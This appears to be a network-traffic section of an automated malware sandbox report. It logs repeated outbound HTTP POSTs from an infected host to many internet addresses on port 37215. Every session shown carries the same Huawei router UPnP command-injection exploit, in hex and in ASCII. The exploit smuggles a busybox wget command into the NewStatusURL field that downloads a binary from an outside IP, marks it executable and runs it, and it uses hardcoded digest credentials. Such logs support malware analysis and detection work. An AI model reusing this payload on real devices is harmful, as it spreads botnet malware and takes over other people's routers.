                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              660192.168.2.155091237.39.153.9537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.224524021 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              661192.168.2.1536516190.83.19.24937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.224524975 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              662192.168.2.1547234121.127.53.15037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.224555016 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              663192.168.2.153456445.46.117.4837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.224663019 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              664192.168.2.1533762186.73.103.7637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.224663019 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              665192.168.2.154484031.188.102.23137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.224719048 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              666192.168.2.153496294.254.83.12737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.224719048 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              667192.168.2.1558812222.135.251.7237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.224721909 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              668192.168.2.154166045.198.212.19937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.224737883 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              669192.168.2.1547672122.66.113.15037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.224761963 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
